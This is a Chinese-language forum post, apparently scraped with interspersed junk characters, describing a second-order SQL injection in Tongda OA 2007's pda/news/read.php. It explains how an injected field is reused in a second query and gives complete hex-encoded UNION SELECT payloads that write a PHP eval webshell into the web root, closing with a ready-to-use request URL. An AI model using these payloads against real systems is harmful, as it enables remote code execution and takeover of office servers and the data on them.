目前测试通达OA2007版本
% K+ n, n+ f4 J* l0 u
- O9 w# E' R v6 V$ B; ^0 _ * L) X P' ?' n7 [4 m i
Office Anywhere 2007 网络智能办公系统
- r a6 I, r' r, U5 c7 w \0 K " j7 e1 g" O) a; @- C" d2 X
http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录../ D+ i3 w }$ q: ]* ^7 ]" E d
+ ^ t2 x# @) s
. B* E7 t+ O# O这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的1 F6 J6 R+ q2 V" G# k0 e1 I& \7 b
/ R/ J3 l5 C( V) B( k0 H例如:SELECT * from USER where USER_ID='{$USERNAME}'
4 f' R) ~4 k, {! k; m其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
3 k4 }/ L7 v( U O% r% h- S , Z- t2 ?% Q7 E T# `
这个时候我们是不是可以组合起来使用哪?
& _" |8 k/ |0 R5 c6 N
5 p- t: {+ i+ I7 m. U第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
& @& P- z; o$ N/ w1 N4 Z8 vunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10; d! F% `6 g7 G9 T# g5 r4 d. g
: f4 ?, c7 I9 {: J( _1 |& Z' j% P这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了/ b- p; R7 D! F
- `6 A4 t- A0 _% E那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
7 ~0 y$ P$ J9 O2 T* ?& K: u3 V" i & @' R- S" _" S
那么我们用字符串格式带入进行hex编码
1 o+ Q& R ~, y' e4 q 9 d3 _. _2 n+ R' ^
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
, D: f% t9 I) P1 ^
- W: I1 x* N! A& U3 Y测试ok,获取oa的webshell
7 B7 ~7 d( j$ S/ q2 B1 }+ _
' _+ E5 j9 ?# G3 s 1 U* N1 v8 L% c' _" E/ }
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
* z0 ^6 V( e3 a" o! ^0 d直接getwebshell |